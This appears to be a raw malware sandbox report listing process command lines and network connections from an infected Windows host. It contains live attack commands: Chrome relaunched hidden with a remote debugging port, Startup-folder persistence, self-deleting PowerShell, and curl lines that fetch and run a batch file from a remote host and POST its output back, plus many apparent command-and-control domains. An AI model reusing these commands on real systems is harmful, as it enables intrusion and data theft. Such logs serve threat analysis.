"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Windows\explorer.exe

explorer.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SysWOW64\choice.exe

choice /d y /t 5

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SysWOW64\cmd.exe

cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url" & echo URL="C:\Users\Admin\AppData\Local\TechMesh Dynamics\InnoMesh.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url" & exit

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\ProgramData\gnabpgw\wohcj.exe

"C:\ProgramData\gnabpgw\wohcj.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.1.0.1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5348,i,23245141580565780,13647984568080206798,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4828 /prefetch:8

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Users\Admin\MicrosoftProfile.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Windows\explorer.exe

explorer.exe

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.1.0.1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x124,0x128,0x12c,0x120,0xf4,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

\??\c:\windows\resources\spoolsv.exe

c:\windows\resources\spoolsv.exe SE

\??\c:\windows\resources\svchost.exe

c:\windows\resources\svchost.exe

\??\c:\windows\resources\spoolsv.exe

c:\windows\resources\spoolsv.exe SE

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x114,0x118,0x11c,0xf0,0x120,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe

\??\c:\windows\resources\spoolsv.exe

c:\windows\resources\spoolsv.exe SE

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0x114,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

\??\c:\windows\resources\spoolsv.exe

c:\windows\resources\spoolsv.exe SE

\??\c:\windows\resources\spoolsv.exe

c:\windows\resources\spoolsv.exe SE

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

\??\c:\windows\resources\spoolsv.exe

c:\windows\resources\spoolsv.exe SE

\??\c:\windows\resources\spoolsv.exe

c:\windows\resources\spoolsv.exe SE

\??\c:\windows\resources\spoolsv.exe

c:\windows\resources\spoolsv.exe SE

\??\c:\windows\resources\spoolsv.exe

c:\windows\resources\spoolsv.exe SE

\??\c:\windows\resources\spoolsv.exe

c:\windows\resources\spoolsv.exe SE

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C4465736B746F705C4E6577205465787420446F63756D656E74206D6F642E657873655C615C4D3569465232302E657865" -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"

C:\Windows\SysWOW64\cmd.exe

cmd /c type "C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C4465736B746F705C4E6577205465787420446F63756D656E74206D6F642E657873655C615C4D3569465232302E657865" -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt

C:\ProgramData\gnabpgw\wohcj.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C4465736B746F705C4E6577205465787420446F63756D656E74206D6F642E657873655C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"

C:\ProgramData\gnabpgw\wohcj.exe

"C:\ProgramData\gnabpgw\wohcj.exe"

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\ProgramData\gnabpgw\wohcj.exe

"C:\ProgramData\gnabpgw\wohcj.exe"

C:\Windows\explorer.exe

explorer.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe

C:\ProgramData\gnabpgw\wohcj.exe

"C:\ProgramData\gnabpgw\wohcj.exe"

Network

US 8.8.8.8:53 34.90.215.178.in-addr.arpa udp
US 8.8.8.8:53 147.197.217.83.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 peerhost59mj7i6macla65r.com udp
NL 94.154.172.218:443 peerhost59mj7i6macla65r.com tcp
US 8.8.8.8:53 30.19.108.213.in-addr.arpa udp
US 8.8.8.8:53 25.206.217.83.in-addr.arpa udp
NL 94.154.172.218:443 peerhost59mj7i6macla65r.com tcp
US 8.8.8.8:53 218.172.154.94.in-addr.arpa udp
US 8.8.8.8:53 ikswccmqsqeswegi.xyz udp
RU 178.215.75.170:80 tcp
RU 83.217.206.25:2000 tcp
US 8.8.8.8:53 aukuqiksseyscgie.xyz udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 infect-crackle.cyou udp
NL 94.154.172.218:443 peerhost59mj7i6macla65r.com tcp
US 172.67.216.167:443 infect-crackle.cyou tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 54.192.217.83.in-addr.arpa udp
US 8.8.8.8:53 170.75.215.178.in-addr.arpa udp
US 8.8.8.8:53 124.191.200.185.in-addr.arpa udp
US 8.8.8.8:53 se-blurry.biz udp
US 8.8.8.8:53 zinc-sneark.biz udp
US 8.8.8.8:53 dwell-exclaim.biz udp
NL 94.154.172.218:443 peerhost59mj7i6macla65r.com tcp
US 8.8.8.8:53 formy-spill.biz udp
US 172.67.206.64:443 covery-mover.biz tcp
US 8.8.8.8:53 dare-curbys.biz udp
US 8.8.8.8:53 print-vexer.biz udp
US 8.8.8.8:53 impend-differ.biz udp
FR 23.217.238.254:443 steamcommunity.com tcp
SE 93.188.1.110:49810 ftpcluster.loopia.se tcp
N/A 224.0.0.251:5353 udp
DE 185.218.125.157:21441 tcp
NL 38.180.123.95:3232 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 fightlsoser.click udp
US 8.8.8.8:53 ipinfo.io udp
US 172.67.213.48:443 fightlsoser.click tcp
US 34.117.59.81:443 ipinfo.io tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 se-blurry.biz udp
US 8.8.8.8:53 zinc-sneark.biz udp
US 8.8.8.8:53 dwell-exclaim.biz udp
US 8.8.8.8:53 formy-spill.biz udp
US 172.67.206.64:443 covery-mover.biz tcp
US 8.8.8.8:53 48.213.67.172.in-addr.arpa udp
US 8.8.8.8:53 dare-curbys.biz udp
US 8.8.8.8:53 print-vexer.biz udp
US 8.8.8.8:53 impend-differ.biz udp
FR 23.217.238.254:443 steamcommunity.com tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 162.159.135.234:443 gateway.discord.gg tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
FR 194.59.30.220:1336 tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
CN 113.45.142.235:8888 tcp
DE 185.218.125.157:21441 tcp
DE 159.89.102.253:443 geolocation-db.com tcp
US 162.159.136.232:443 discord.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
NL 149.154.167.99:443 t.me tcp
FR 194.59.30.220:1336 tcp
DE 116.203.10.31:443 grahm.xyz tcp
DE 116.203.10.31:443 grahm.xyz tcp
DE 185.218.125.157:21441 tcp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 252.15.104.51.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
DE 116.203.10.31:443 grahm.xyz tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
FR 142.250.75.238:443 drive.google.com tcp
DE 116.203.10.31:443 grahm.xyz tcp
FR 142.250.74.225:443 drive.usercontent.google.com tcp
DE 116.203.10.31:443 grahm.xyz tcp
DE 185.218.125.157:21441 tcp
DE 116.203.10.31:443 grahm.xyz tcp
NL 38.180.123.95:3232 tcp
US 8.8.8.8:53 ikswccmqsqeswegi.xyz udp
US 162.159.135.234:443 gateway.discord.gg tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 116.203.10.31:443 grahm.xyz tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
US 162.159.136.232:443 discord.com tcp
US 34.117.59.81:443 ipinfo.io tcp
DE 185.218.125.157:21441 tcp
DE 101.99.92.189:8080 tcp
US 8.8.8.8:53 189.92.99.101.in-addr.arpa udp
US 8.8.8.8:53 mysql682.loopia.se udp
DE 185.218.125.157:21441 tcp
SE 93.188.1.8:3306 mysql682.loopia.se tcp
RS 79.101.0.33:3306 tcp
US 34.117.59.81:443 ipinfo.io tcp
DE 159.89.102.253:443 geolocation-db.com tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 8.1.188.93.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 ftpcluster.loopia.se udp
US 8.8.8.8:53 t.me udp
US 8.8.8.8:53 resinedyw.sbs udp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 mathcucom.sbs udp
US 8.8.8.8:53 allocatinow.sbs udp
US 8.8.8.8:53 enlargkiw.sbs udp
NL 149.154.167.220:443 api.telegram.org tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
NL 149.154.167.220:443 api.telegram.org tcp
DE 185.218.125.157:21441 tcp
DE 116.203.10.31:443 grahm.xyz tcp
US 162.159.136.232:443 discord.com tcp
SE 93.188.1.110:21 ftpcluster.loopia.se tcp
US 8.8.8.8:53 vennurviot.sbs udp
DE 116.203.10.31:443 grahm.xyz tcp
SE 93.188.1.110:52205 ftpcluster.loopia.se tcp
SE 93.188.1.110:65250 ftpcluster.loopia.se tcp
US 8.8.8.8:53 ehticsprocw.sbs udp
US 8.8.8.8:53 condifendteu.sbs udp
US 8.8.8.8:53 drawwyobstacw.sbs udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.124.170.33:443 steamcommunity.com tcp
DE 185.218.125.157:21441 tcp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 33.170.124.104.in-addr.arpa udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 drive-connect.cyou udp
US 104.21.79.7:443 drive-connect.cyou tcp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 7.79.21.104.in-addr.arpa udp
US 8.8.8.8:53 se-blurry.biz udp
US 8.8.8.8:53 zinc-sneark.biz udp
US 8.8.8.8:53 dwell-exclaim.biz udp
DE 116.203.10.31:443 grahm.xyz tcp
SE 93.188.1.110:49576 ftpcluster.loopia.se tcp
RS 79.101.0.33:3306 tcp
US 8.8.8.8:53 funletters.net udp
US 208.122.221.162:80 funletters.net tcp
US 8.8.8.8:53 formy-spill.biz udp
US 172.67.206.64:443 covery-mover.biz tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 162.221.122.208.in-addr.arpa udp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 dare-curbys.biz udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 print-vexer.biz udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 mysql679.loopia.se udp
DE 116.203.10.31:443 grahm.xyz tcp
SE 93.188.1.5:3306 mysql679.loopia.se tcp
US 8.8.8.8:53 impend-differ.biz udp
GB 104.124.170.33:443 steamcommunity.com tcp
US 8.8.8.8:53 5.1.188.93.in-addr.arpa udp
DE 116.203.10.31:443 grahm.xyz tcp
US 172.67.216.167:443 infect-crackle.cyou tcp
US 8.8.8.8:53 se-blurry.biz udp
US 8.8.8.8:53 zinc-sneark.biz udp
US 8.8.8.8:53 dwell-exclaim.biz udp
US 8.8.8.8:53 formy-spill.biz udp
US 172.67.206.64:443 covery-mover.biz tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 dare-curbys.biz udp
US 8.8.8.8:53 print-vexer.biz udp
NL 38.180.123.95:3232 tcp
US 8.8.8.8:53 impend-differ.biz udp
GB 104.124.170.33:443 steamcommunity.com tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 ikswccmqsqeswegi.xyz udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
US 8.8.8.8:53 a1059592.xsph.ru udp
RU 141.8.192.138:80 a1059592.xsph.ru tcp
US 8.8.8.8:53 138.192.8.141.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 ikswccmqsqeswegi.xyz udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
NL 38.180.123.95:3232 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 f1043947.xsph.ru udp
RU 141.8.192.151:80 f1043947.xsph.ru tcp
US 8.8.8.8:53 151.192.8.141.in-addr.arpa udp
US 8.8.8.8:53 a1051707.xsph.ru udp
RU 141.8.192.217:80 a1051707.xsph.ru tcp
US 8.8.8.8:53 www.funletters.net udp
US 208.122.221.162:80 www.funletters.net tcp
US 208.122.221.162:80 www.funletters.net tcp
RU 141.8.192.138:80 a1059592.xsph.ru tcp
US 8.8.8.8:53 217.192.8.141.in-addr.arpa udp
US 8.8.8.8:53 httpbin.org udp
US 44.206.71.62:443 httpbin.org tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:80 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 208.122.221.162:80 www.funletters.net tcp
US 208.122.221.162:80 www.funletters.net tcp
